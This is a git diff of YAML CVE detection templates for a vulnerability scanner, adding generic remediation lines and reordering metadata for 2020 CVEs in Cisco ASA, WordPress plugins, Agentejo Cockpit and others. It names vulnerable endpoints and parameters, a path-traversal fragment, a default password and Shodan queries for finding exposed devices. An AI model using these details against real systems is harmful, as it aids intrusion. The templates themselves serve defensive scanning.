cpe:2.3:o:mitel:shoretel_firmware:19.46.1802.0:*:*:*:*:*:*:* epss-percentile: 0.68696 + cpe: cpe:2.3:o:mitel:shoretel_firmware:19.46.1802.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: mitel diff --git a/http/cves/2020/CVE-2020-28871.yaml b/http/cves/2020/CVE-2020-28871.yaml index 5a2776f594..67d8e84484 100644 --- a/http/cves/2020/CVE-2020-28871.yaml +++ b/http/cves/2020/CVE-2020-28871.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: Monitorr 1.7.6m is susceptible to a remote code execution vulnerability. Improper input validation and lack of authorization leads to arbitrary file uploads in the web application. An unauthorized attacker with web access to could upload and execute a specially crafted file, leading to remote code execution within the Monitorr. + remediation: | + Upgrade to a patched version of Monitorr or apply the necessary security patches. reference: - https://www.exploit-db.com/exploits/48980 - https://lyhinslab.org/index.php/2020/09/12/how-the-white-box-hacking-works-authorization-bypass-and-remote-code-execution-in-monitorr-1-7-6/ @@ -17,8 +19,8 @@ info: cve-id: CVE-2020-28871 cwe-id: CWE-434 epss-score: 0.96633 - cpe: cpe:2.3:a:monitorr_project:monitorr:1.7.6m:*:*:*:*:*:*:* epss-percentile: 0.99468 + cpe: cpe:2.3:a:monitorr_project:monitorr:1.7.6m:*:*:*:*:*:*:* metadata: max-request: 2 vendor: monitorr_project diff --git a/http/cves/2020/CVE-2020-28976.yaml b/http/cves/2020/CVE-2020-28976.yaml index ef0ff9dff5..266da7d2ec 100644 --- a/http/cves/2020/CVE-2020-28976.yaml +++ b/http/cves/2020/CVE-2020-28976.yaml @@ -5,6 +5,8 @@ info: author: LogicalHunter severity: medium description: WordPress Canto plugin 1.3.0 is susceptible to blind server-side request forgery. An attacker can make a request to any internal and external server via /includes/lib/detail.php?subdomain and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: | + Update WordPress Canto to the latest version (1.3.1) or apply the patch provided by the vendor. reference: - https://www.exploit-db.com/exploits/49189 - https://www.canto.com/integrations/wordpress/ @@ -17,13 +19,13 @@ info: cve-id: CVE-2020-28976 cwe-id: CWE-918 epss-score: 0.00616 - cpe: cpe:2.3:a:canto:canto:1.3.0:*:*:*:*:wordpress:*:* epss-percentile: 0.76102 + cpe: cpe:2.3:a:canto:canto:1.3.0:*:*:*:*:wordpress:*:* metadata: max-request: 3 - framework: wordpress vendor: canto product: canto + framework: wordpress tags: packetstorm,cve,cve2020,ssrf,wordpress,wp-plugin,oast,edb http: diff --git a/http/cves/2020/CVE-2020-29164.yaml b/http/cves/2020/CVE-2020-29164.yaml index 173b04431e..532de6ce7c 100644 --- a/http/cves/2020/CVE-2020-29164.yaml +++ b/http/cves/2020/CVE-2020-29164.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: PacsOne Server (PACS Server In One Box) below 7.1.1 is vulnerable to cross-site scripting. + remediation: | + Upgrade to PacsOne Server version 7.1.1 or later to mitigate this vulnerability. reference: - https://gist.github.com/leommxj/0a32afeeaac960682c5b7c9ca8ed070d - https://pacsone.net/download.htm @@ -15,8 +17,8 @@ info: cve-id: CVE-2020-29164 cwe-id: CWE-79 epss-score: 0.00159 - cpe: cpe:2.3:a:rainbowfishsoftware:pacsone_server:*:*:*:*:*:*:*:* epss-percentile: 0.51802 + cpe: cpe:2.3:a:rainbowfishsoftware:pacsone_server:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: rainbowfishsoftware diff --git a/http/cves/2020/CVE-2020-29227.yaml b/http/cves/2020/CVE-2020-29227.yaml index 933a1586fe..43a0012c99 100644 --- a/http/cves/2020/CVE-2020-29227.yaml +++ b/http/cves/2020/CVE-2020-29227.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: critical description: Car Rental Management System 1.0 allows an unauthenticated user to perform a file inclusion attack against the /index.php file with a partial filename in the "page" parameter, leading to code execution. + remediation: | + Apply the latest patch or update provided by the vendor to fix the LFI vulnerability in the Car Rental Management System 1.0. reference: - https://loopspell.medium.com/cve-2020-29227-unauthenticated-local-file-inclusion-7d3bd2c5c6a5 - https://nvd.nist.gov/vuln/detail/CVE-2020-29227 @@ -14,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-29227 epss-score: 0.00834 - cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:* epss-percentile: 0.79881 + cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: car_rental_management_system_project diff --git a/http/cves/2020/CVE-2020-29284.yaml b/http/cves/2020/CVE-2020-29284.yaml index fccd5c8ac6..5b0002d0a8 100644 --- a/http/cves/2020/CVE-2020-29284.yaml +++ b/http/cves/2020/CVE-2020-29284.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Sourcecodester Multi Restaurant Table Reservation System 1.0 contains a SQL injection vulnerability via the file view-chair-list.php. It does not perform input validation on the table_id parameter, which allows unauthenticated SQL injection. An attacker can send malicious input in the GET request to /dashboard/view-chair-list.php?table_id= to trigger the vulnerability. + remediation: | + Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Sourcecodester Multi Restaurant Table Reservation System 1.0. reference: - https://www.exploit-db.com/exploits/48984 - https://www.sourcecodester.com/sites/default/files/download/janobe/tablereservation.zip @@ -18,11 +20,11 @@ info: cve-id: CVE-2020-29284 cwe-id: CWE-89 epss-score: 0.04855 - cpe: cpe:2.3:a:multi_restaurant_table_reservation_system_project:multi_restaurant_table_reservation_system:1.0:*:*:*:*:*:*:* epss-percentile: 0.91729 + cpe: cpe:2.3:a:multi_restaurant_table_reservation_system_project:multi_restaurant_table_reservation_system:1.0:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 vendor: multi_restaurant_table_reservation_system_project product: multi_restaurant_table_reservation_system tags: cve2020,tablereservation,sqli,unauth,edb,cve diff --git a/http/cves/2020/CVE-2020-29395.yaml b/http/cves/2020/CVE-2020-29395.yaml index efeee50ee7..1ceb572bfa 100644 --- a/http/cves/2020/CVE-2020-29395.yaml +++ b/http/cves/2020/CVE-2020-29395.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Wordpress EventON Calendar 3.0.5 is vulnerable to cross-site scripting because it allows addons/?q= XSS via the search field. + remediation: | + Update to the latest version of the Wordpress EventON Calendar plugin (3.0.6) to mitigate this vulnerability. reference: - https://github.com/mustgundogdu/Research/tree/main/EventON_PLUGIN_XSS - https://www.myeventon.com/news/ @@ -16,13 +18,13 @@ info: cve-id: CVE-2020-29395 cwe-id: CWE-79 epss-score: 0.05489 - cpe: cpe:2.3:a:myeventon:eventon:*:*:*:*:*:wordpress:*:* epss-percentile: 0.92226 + cpe: cpe:2.3:a:myeventon:eventon:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: myeventon product: eventon + framework: wordpress tags: cve,cve2020,wordpress,xss,wp-plugin,packetstorm http: diff --git a/http/cves/2020/CVE-2020-29453.yaml b/http/cves/2020/CVE-2020-29453.yaml index 9dd1cdb2ba..d1004e1132 100644 --- a/http/cves/2020/CVE-2020-29453.yaml +++ b/http/cves/2020/CVE-2020-29453.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: medium description: The CachingResourceDownloadRewriteRule class in Jira Server and Jira Data Center allowed unauthenticated remote attackers to read arbitrary files within WEB-INF and META-INF directories via an incorrect path access check. + remediation: | + Apply the necessary patches or updates provided by Atlassian to fix the vulnerability. reference: - https://jira.atlassian.com/browse/JRASERVER-72014 - https://nvd.nist.gov/vuln/detail/CVE-2020-29453 @@ -14,13 +16,13 @@ info: cve-id: CVE-2020-29453 cwe-id: CWE-22 epss-score: 0.0129 - cpe: cpe:2.3:a:atlassian:data_center:*:*:*:*:*:*:*:* epss-percentile: 0.84109 + cpe: cpe:2.3:a:atlassian:data_center:*:*:*:*:*:*:*:* metadata: max-request: 2 - shodan-query: http.component:"Atlassian Jira" vendor: atlassian product: data_center + shodan-query: http.component:"Atlassian Jira" tags: cve,cve2020,atlassian,jira,lfi,intrusive http: diff --git a/http/cves/2020/CVE-2020-29583.yaml b/http/cves/2020/CVE-2020-29583.yaml index 3bb4131a60..593ec5ec0a 100644 --- a/http/cves/2020/CVE-2020-29583.yaml +++ b/http/cves/2020/CVE-2020-29583.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | A hardcoded credential vulnerability was identified in the 'zyfwp' user account in some Zyxel firewalls and AP controllers. The account was designed to deliver automatic firmware updates to connected access points through FTP. + remediation: | + Update the firmware of the ZyXel USG device to the latest version, which addresses the hardcoded credentials issue. reference: - https://www.zyxel.com/support/CVE-2020-29583.shtml - https://support.zyxel.eu/hc/en-us/articles/360018524720-Zyxel-security-advisory-for-hardcoded-credential-vulnerability-CVE-2020-29583 @@ -18,14 +20,14 @@ info: cve-id: CVE-2020-29583 cwe-id: CWE-522 epss-score: 0.95089 - cpe: cpe:2.3:o:zyxel:usg20-vpn_firmware:4.60:*:*:*:*:*:*:* epss-percentile: 0.99017 + cpe: cpe:2.3:o:zyxel:usg20-vpn_firmware:4.60:*:*:*:*:*:*:* metadata: - max-request: 2 verified: true - shodan-query: title:"USG FLEX 100" + max-request: 2 vendor: zyxel product: usg20-vpn_firmware + shodan-query: title:"USG FLEX 100" tags: cve,cve2020,ftp-backdoor,zyxel,bypass,kev http: diff --git a/http/cves/2020/CVE-2020-29597.yaml b/http/cves/2020/CVE-2020-29597.yaml index caf611f4b1..e5c059ff37 100644 --- a/http/cves/2020/CVE-2020-29597.yaml +++ b/http/cves/2020/CVE-2020-29597.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | IncomCMS 2.0 has a an insecure file upload vulnerability in modules/uploader/showcase/script.php. This allows unauthenticated attackers to upload files into the server. + remediation: | + Apply the latest security patch or update to a version that addresses the vulnerability. reference: - https://github.com/Trhackno/CVE-2020-29597 - https://nvd.nist.gov/vuln/detail/CVE-2020-29597 @@ -17,11 +19,11 @@ info: cve-id: CVE-2020-29597 cwe-id: CWE-434 epss-score: 0.83723 - cpe: cpe:2.3:a:incomcms_project:incomcms:2.0:*:*:*:*:*:*:* epss-percentile: 0.98014 + cpe: cpe:2.3:a:incomcms_project:incomcms:2.0:*:*:*:*:*:*:* metadata: - max-request: 2 verified: true + max-request: 2 vendor: incomcms_project product: incomcms tags: cve,cve2020,incomcms,fileupload,intrusive diff --git a/http/cves/2020/CVE-2020-3187.yaml b/http/cves/2020/CVE-2020-3187.yaml index c23fd0d07e..a98064e04a 100644 --- a/http/cves/2020/CVE-2020-3187.yaml +++ b/http/cves/2020/CVE-2020-3187.yaml @@ -5,6 +5,8 @@ info: author: KareemSe1im severity: critical description: Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software are susceptible to directory traversal vulnerabilities that could allow an unauthenticated, remote attacker to obtain read and delete access to sensitive files on a targeted system. + remediation: | + Apply the necessary security patches or updates provided by Cisco to mitigate the vulnerability. reference: - https://twitter.com/aboul3la/status/1286809567989575685 - http://packetstormsecurity.com/files/158648/Cisco-Adaptive-Security-Appliance-Software-9.7-Arbitrary-File-Deletion.html @@ -16,8 +18,8 @@ info: cve-id: CVE-2020-3187 cwe-id: CWE-22 epss-score: 0.97377 - cpe: cpe:2.3:a:cisco:firepower_threat_defense:*:*:*:*:*:*:*:* epss-percentile: 0.9986 + cpe: cpe:2.3:a:cisco:firepower_threat_defense:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: cisco diff --git a/http/cves/2020/CVE-2020-3452.yaml b/http/cves/2020/CVE-2020-3452.yaml index 1634e08d72..d4ee715e7e 100644 --- a/http/cves/2020/CVE-2020-3452.yaml +++ b/http/cves/2020/CVE-2020-3452.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software is vulnerable to local file inclusion due to directory traversal attacks that can read sensitive files on a targeted system because of a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files. + remediation: | + Apply the necessary security patches or updates provided by Cisco to fix the vulnerability. reference: - https://twitter.com/aboul3la/status/1286012324722155525 - http://packetstormsecurity.com/files/158646/Cisco-ASA-FTD-Remote-File-Disclosure.html @@ -20,8 +22,8 @@ info: cve-id: CVE-2020-3452 cwe-id: CWE-22,CWE-20 epss-score: 0.97534 - cpe: cpe:2.3:o:cisco:adaptive_security_appliance_software:*:*:*:*:*:*:*:* epss-percentile: 0.99987 + cpe: cpe:2.3:o:cisco:adaptive_security_appliance_software:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: cisco diff --git a/http/cves/2020/CVE-2020-35234.yaml b/http/cves/2020/CVE-2020-35234.yaml index e054f358e9..5a9c40133f 100644 --- a/http/cves/2020/CVE-2020-35234.yaml +++ b/http/cves/2020/CVE-2020-35234.yaml @@ -5,24 +5,24 @@ info: author: PR3R00T severity: high description: The WordPress Easy WP SMTP Plugin has its log folder remotely accessible and its content available for access. + remediation: Upgrade to version 1.4.3 or newer and consider disabling debug logs. reference: - https://nvd.nist.gov/vuln/detail/CVE-2020-35234 - https://blog.nintechnet.com/wordpress-easy-wp-smtp-plugin-fixed-zero-day-vulnerability/ - https://wordpress.org/plugins/easy-wp-smtp/#developers - remediation: Upgrade to version 1.4.3 or newer and consider disabling debug logs. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-35234 cwe-id: CWE-532 epss-score: 0.39621 - cpe: cpe:2.3:a:wp-ecommerce:easy_wp_smtp:*:*:*:*:*:wordpress:*:* epss-percentile: 0.9676 + cpe: cpe:2.3:a:wp-ecommerce:easy_wp_smtp:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 - framework: wordpress vendor: wp-ecommerce product: easy_wp_smtp + framework: wordpress tags: cve,cve2020,wordpress,wp-plugin,smtp http: diff --git a/http/cves/2020/CVE-2020-35338.yaml b/http/cves/2020/CVE-2020-35338.yaml index 6bd4a93948..09b989aa2e 100644 --- a/http/cves/2020/CVE-2020-35338.yaml +++ b/http/cves/2020/CVE-2020-35338.yaml @@ -5,6 +5,8 @@ info: author: Jeya Seelan severity: critical description: Wireless Multiplex Terminal Playout Server <=20.2.8 has a default account with a password of pokon available via its web administrative interface. + remediation: | + Change the default credentials to strong and unique ones. reference: - https://jeyaseelans.medium.com/cve-2020-35338-9e841f48defa - https://nvd.nist.gov/vuln/detail/CVE-2020-35338 @@ -15,8 +17,8 @@ info: cve-id: CVE-2020-35338 cwe-id: CWE-798 epss-score: 0.05169 - cpe: cpe:2.3:a:mobileviewpoint:wireless_multiplex_terminal_playout_server:*:*:*:*:*:*:*:* epss-percentile: 0.91985 + cpe: cpe:2.3:a:mobileviewpoint:wireless_multiplex_terminal_playout_server:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: mobileviewpoint diff --git a/http/cves/2020/CVE-2020-35476.yaml b/http/cves/2020/CVE-2020-35476.yaml index 52c18e76f6..43f3323a34 100644 --- a/http/cves/2020/CVE-2020-35476.yaml +++ b/http/cves/2020/CVE-2020-35476.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | OpenTSDB 2.4.0 and earlier is susceptible to remote code execution via the yrange parameter written to a gnuplot file in the /tmp directory. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + remediation: | + Upgrade OpenTSDB to a version higher than 2.4.0 to mitigate this vulnerability. reference: - https://github.com/OpenTSDB/opentsdb/issues/2051 - http://packetstormsecurity.com/files/170331/OpenTSDB-2.4.0-Command-Injection.html @@ -16,14 +18,14 @@ info: cve-id: CVE-2020-35476 cwe-id: CWE-78 epss-score: 0.96323 - cpe: cpe:2.3:a:opentsdb:opentsdb:*:*:*:*:*:*:*:* epss-percentile: 0.99341 + cpe: cpe:2.3:a:opentsdb:opentsdb:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true - shodan-query: html:"OpenTSDB" + max-request: 1 vendor: opentsdb product: opentsdb + shodan-query: html:"OpenTSDB" tags: cve,cve2020,opentsdb,rce,packetstorm http: diff --git a/http/cves/2020/CVE-2020-35489.yaml b/http/cves/2020/CVE-2020-35489.yaml index 31e6f053b5..74c48913ac 100644 --- a/http/cves/2020/CVE-2020-35489.yaml +++ b/http/cves/2020/CVE-2020-35489.yaml @@ -5,6 +5,8 @@ info: author: soyelmago severity: critical description: WordPress Contact Form 7 before 5.3.2 allows unrestricted file upload and remote code execution because a filename may contain special characters. + remediation: | + Update to the latest version of the Contact Form 7 plugin to mitigate this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2020-35489 - https://web.archive.org/web/20210125141546/https://www.getastra.com/blog/911/plugin-exploit/contact-form-7-unrestricted-file-upload-vulnerability/ @@ -17,13 +19,13 @@ info: cve-id: CVE-2020-35489 cwe-id: CWE-434 epss-score: 0.92577 - cpe: cpe:2.3:a:rocklobster:contact_form_7:*:*:*:*:*:wordpress:*:* epss-percentile: 0.98617 + cpe: cpe:2.3:a:rocklobster:contact_form_7:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: rocklobster product: contact_form_7 + framework: wordpress tags: cve,cve2020,wordpress,wp-plugin,rce http: diff --git a/http/cves/2020/CVE-2020-35580.yaml b/http/cves/2020/CVE-2020-35580.yaml index 93e0c5f41b..d675bb2392 100644 --- a/http/cves/2020/CVE-2020-35580.yaml +++ b/http/cves/2020/CVE-2020-35580.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: SearchBlox prior to version 9.2.2 is susceptible to local file inclusion in FileServlet that allows remote, unauthenticated users to read arbitrary files from the operating system via a /searchblox/servlet/FileServlet?col=url= request. Additionally, this may be used to read the contents of the SearchBlox configuration file (e.g., searchblox/WEB-INF/config.xml), which contains both the Super Admin API key and the base64 encoded SHA1 password hashes of other SearchBlox users. + remediation: | + Upgrade to SearchBlox version 9.2.2 or later to mitigate the vulnerability. reference: - https://hateshape.github.io/general/2021/05/11/CVE-2020-35580.html - https://developer.searchblox.com/docs/getting-started-with-searchblox @@ -15,8 +17,8 @@ info: cve-id: CVE-2020-35580 cwe-id: CWE-22 epss-score: 0.02411 - cpe: cpe:2.3:a:searchblox:searchblox:*:*:*:*:*:*:*:* epss-percentile: 0.88535 + cpe: cpe:2.3:a:searchblox:searchblox:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: searchblox diff --git a/http/cves/2020/CVE-2020-35598.yaml b/http/cves/2020/CVE-2020-35598.yaml index d98803ec80..6148104d45 100644 --- a/http/cves/2020/CVE-2020-35598.yaml +++ b/http/cves/2020/CVE-2020-35598.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: ACS Advanced Comment System 1.0 is affected by local file inclusion via an advanced_component_system/index.php?ACS_path=..%2f URI. + remediation: | + Apply the latest patch or update provided by the vendor to fix the local file inclusion vulnerability in the Advanced Comment System 1.0. reference: - https://www.exploit-db.com/exploits/49343 - https://seclists.org/fulldisclosure/2020/Dec/13 @@ -15,8 +17,8 @@ info: cve-id: CVE-2020-35598 cwe-id: CWE-22 epss-score: 0.10794 - cpe: cpe:2.3:a:advanced_comment_system_project:advanced_comment_system:1.0:*:*:*:*:*:*:* epss-percentile: 0.94342 + cpe: cpe:2.3:a:advanced_comment_system_project:advanced_comment_system:1.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: advanced_comment_system_project diff --git a/http/cves/2020/CVE-2020-35713.yaml b/http/cves/2020/CVE-2020-35713.yaml index 2fe3c7af2e..281c0ede28 100644 --- a/http/cves/2020/CVE-2020-35713.yaml +++ b/http/cves/2020/CVE-2020-35713.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: Belkin LINKSYS RE6500 devices before 1.0.012.001 allow remote attackers to execute arbitrary commands or set a new password via shell metacharacters to the goform/setSysAdm page. + remediation: | + Update the Belkin Linksys RE6500 firmware to version 1.0.012.001 or later. reference: - https://downloads.linksys.com/support/assets/releasenotes/ExternalReleaseNotes_RE6500_1.0.012.001.txt - https://resolverblog.blogspot.com/2020/07/linksys-re6500-unauthenticated-rce-full.html @@ -16,8 +18,8 @@ info: cve-id: CVE-2020-35713 cwe-id: CWE-78 epss-score: 0.9717 - cpe: cpe:2.3:o:linksys:re6500_firmware:*:*:*:*:*:*:*:* epss-percentile: 0.99711 + cpe: cpe:2.3:o:linksys:re6500_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: linksys diff --git a/http/cves/2020/CVE-2020-35729.yaml b/http/cves/2020/CVE-2020-35729.yaml index 3f653c57d0..4c7692fa84 100644 --- a/http/cves/2020/CVE-2020-35729.yaml +++ b/http/cves/2020/CVE-2020-35729.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: critical description: Klog Server 2.4.1 and prior is susceptible to an unauthenticated command injection vulnerability. The `authenticate.php` file uses the `user` HTTP POST parameter in a call to the `shell_exec()` PHP function without appropriate input validation, allowing arbitrary command execution as the apache user. The sudo configuration permits the Apache user to execute any command as root without providing a password, resulting in privileged command execution as root. Originated from Metasploit module, copyright (c) space-r7. + remediation: | + Upgrade to a patched version of Klog Server (>=2.42) or apply the vendor-supplied patch. reference: - https://docs.unsafe-inline.com/0day/klog-server-unauthentication-command-injection - https://nvd.nist.gov/vuln/detail/CVE-2020-35729 @@ -16,8 +18,8 @@ info: cve-id: CVE-2020-35729 cwe-id: CWE-78 epss-score: 0.95277 - cpe: cpe:2.3:a:klogserver:klog_server:2.4.1:*:*:*:*:*:*:* epss-percentile: 0.99064 + cpe: cpe:2.3:a:klogserver:klog_server:2.4.1:*:*:*:*:*:*:* metadata: max-request: 1 vendor: klogserver diff --git a/http/cves/2020/CVE-2020-35736.yaml b/http/cves/2020/CVE-2020-35736.yaml index f74e9d1fad..6135c7e3d6 100644 --- a/http/cves/2020/CVE-2020-35736.yaml +++ b/http/cves/2020/CVE-2020-35736.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: high description: GateOne 1.1 allows arbitrary file retrieval without authentication via /downloads/.. local file inclusion because os.path.join is incorrectly used. + remediation: | + Apply the latest security patches or updates provided by the vendor to mitigate the LFI vulnerability in GateOne 1.1. reference: - https://github.com/liftoff/GateOne/issues/747 - https://nvd.nist.gov/vuln/detail/CVE-2020-35736 @@ -15,8 +17,8 @@ info: cve-id: CVE-2020-35736 cwe-id: CWE-22 epss-score: 0.01465 - cpe: cpe:2.3:a:liftoffsoftware:gateone:1.1:*:*:*:*:*:*:* epss-percentile: 0.85077 + cpe: cpe:2.3:a:liftoffsoftware:gateone:1.1:*:*:*:*:*:*:* metadata: max-request: 1 vendor: liftoffsoftware diff --git a/http/cves/2020/CVE-2020-35749.yaml b/http/cves/2020/CVE-2020-35749.yaml index 376b9e8256..f16b69a0b8 100644 --- a/http/cves/2020/CVE-2020-35749.yaml +++ b/http/cves/2020/CVE-2020-35749.yaml @@ -5,6 +5,8 @@ info: author: cckuailong severity: high description: WordPress Simple Job Board prior to version 2.9.4 is vulnerable to arbitrary file retrieval vulnerabilities because it does not validate the sjb_file parameter when viewing a resume, allowing an authenticated user with the download_resume capability (such as HR users) to download arbitrary files from the web-server via local file inclusion. + remediation: | + Update to WordPress Simple Job Board version 2.9.4 or later to fix the vulnerability. reference: - https://wpscan.com/vulnerability/eed3bd69-2faf-4bc9-915c-c36211ef9e2d - https://nvd.nist.gov/vuln/detail/CVE-2020-35749 @@ -16,13 +18,13 @@ info: cve-id: CVE-2020-35749 cwe-id: CWE-22 epss-score: 0.01796 - cpe: cpe:2.3:a:presstigers:simple_board_job:*:*:*:*:*:wordpress:*:* epss-percentile: 0.86587 + cpe: cpe:2.3:a:presstigers:simple_board_job:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 - framework: wordpress vendor: presstigers product: simple_board_job + framework: wordpress tags: authenticated,packetstorm,wp,cve2020,lfi,wordpress,wp-plugin,wpscan,cve http: diff --git a/http/cves/2020/CVE-2020-35774.yaml b/http/cves/2020/CVE-2020-35774.yaml index 3b57f68cda..77e7cc94f6 100644 --- a/http/cves/2020/CVE-2020-35774.yaml +++ b/http/cves/2020/CVE-2020-35774.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | twitter-server before 20.12.0 is vulnerable to cross-site scripting in some configurations. The vulnerability exists in the administration panel of twitter-server in the histograms component via server/handler/HistogramQueryHandler.scala. + remediation: | + Apply the latest security patches or updates provided by Twitter to mitigate the XSS vulnerability. reference: - https://advisory.checkmarx.net/advisory/CX-2020-4287 - https://nvd.nist.gov/vuln/detail/CVE-2020-35774 @@ -17,8 +19,8 @@ info: cve-id: CVE-2020-35774 cwe-id: CWE-79 epss-score: 0.97219 - cpe: cpe:2.3:a:twitter:twitter-server:*:*:*:*:*:*:*:* epss-percentile: 0.99744 + cpe: cpe:2.3:a:twitter:twitter-server:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: twitter diff --git a/http/cves/2020/CVE-2020-3580.yaml b/http/cves/2020/CVE-2020-3580.yaml index 8d7dffb416..682ebe4c57 100644 --- a/http/cves/2020/CVE-2020-3580.yaml +++ b/http/cves/2020/CVE-2020-3580.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software are vulnerable to cross-site scripting and could allow an unauthenticated, remote attacker to conduct attacks against a user of the web services interface of an affected device. The vulnerabilities are due to insufficient validation of user-supplied input by the web services interface of an affected device. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or allow the attacker to access sensitive, browser-based information. Note: These vulnerabilities affect only specific AnyConnect and WebVPN configurations. For more information, see the reference links. + remediation: | + Apply the latest security patches or updates provided by Cisco to mitigate this vulnerability. reference: - https://twitter.com/ptswarm/status/1408050644460650502 - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-xss-multiple-FCB3vPZe @@ -16,8 +18,8 @@ info: cve-id: CVE-2020-3580 cwe-id: CWE-79 epss-score: 0.97233 - cpe: cpe:2.3:o:cisco:firepower_threat_defense:*:*:*:*:*:*:*:* epss-percentile: 0.99751 + cpe: cpe:2.3:o:cisco:firepower_threat_defense:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: cisco diff --git a/http/cves/2020/CVE-2020-35846.yaml b/http/cves/2020/CVE-2020-35846.yaml index 5e15ce291f..c3c86b412b 100644 --- a/http/cves/2020/CVE-2020-35846.yaml +++ b/http/cves/2020/CVE-2020-35846.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: critical description: Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php check function. The $eq operator matches documents where the value of a field equals the specified value. + remediation: | + Upgrade Agentejo Cockpit to version 0.11.2 or later to mitigate the vulnerability. reference: - https://swarm.ptsecurity.com/rce-cockpit-cms/ - https://nvd.nist.gov/vuln/detail/CVE-2020-35846 @@ -17,8 +19,8 @@ info: cve-id: CVE-2020-35846 cwe-id: CWE-89 epss-score: 0.80821 - cpe: cpe:2.3:a:agentejo:cockpit:*:*:*:*:*:*:*:* epss-percentile: 0.97904 + cpe: cpe:2.3:a:agentejo:cockpit:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: agentejo diff --git a/http/cves/2020/CVE-2020-35847.yaml b/http/cves/2020/CVE-2020-35847.yaml index 597474129b..a39283715a 100644 --- a/http/cves/2020/CVE-2020-35847.yaml +++ b/http/cves/2020/CVE-2020-35847.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php resetpassword function of the Auth controller. + remediation: | + Upgrade Agentejo Cockpit to version 0.11.2 or later to mitigate this vulnerability. reference: - https://swarm.ptsecurity.com/rce-cockpit-cms/ - https://nvd.nist.gov/vuln/detail/CVE-2020-35847 @@ -18,14 +20,14 @@ info: cve-id: CVE-2020-35847 cwe-id: CWE-89 epss-score: 0.76547 - cpe: cpe:2.3:a:agentejo:cockpit:*:*:*:*:*:*:*:* epss-percentile: 0.97778 + cpe: cpe:2.3:a:agentejo:cockpit:*:*:*:*:*:*:*:* metadata: - max-request: 2 - shodan-query: http.favicon.hash:688609340 verified: true + max-request: 2 vendor: agentejo product: cockpit + shodan-query: http.favicon.hash:688609340 tags: cve,cve2020,nosqli,sqli,cockpit,injection http: diff --git a/http/cves/2020/CVE-2020-35848.yaml b/http/cves/2020/CVE-2020-35848.yaml index fc5328ab07..fa769366de 100644 --- a/http/cves/2020/CVE-2020-35848.yaml +++ b/http/cves/2020/CVE-2020-35848.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: critical description: Agentejo Cockpit prior to 0.12.0 is vulnerable to NoSQL Injection via the newpassword method of the Auth controller, which is responsible for displaying the user password reset form. + remediation: | + Upgrade Agentejo Cockpit to version 0.12.0 or later to mitigate this vulnerability. reference: - https://swarm.ptsecurity.com/rce-cockpit-cms/ - https://nvd.nist.gov/vuln/detail/CVE-2020-35848 @@ -17,8 +19,8 @@ info: cve-id: CVE-2020-35848 cwe-id: CWE-89 epss-score: 0.75494 - cpe: cpe:2.3:a:agentejo:cockpit:*:*:*:*:*:*:*:* epss-percentile: 0.97747 + cpe: cpe:2.3:a:agentejo:cockpit:*:*:*:*:*:*:*:* metadata: max-request: 1 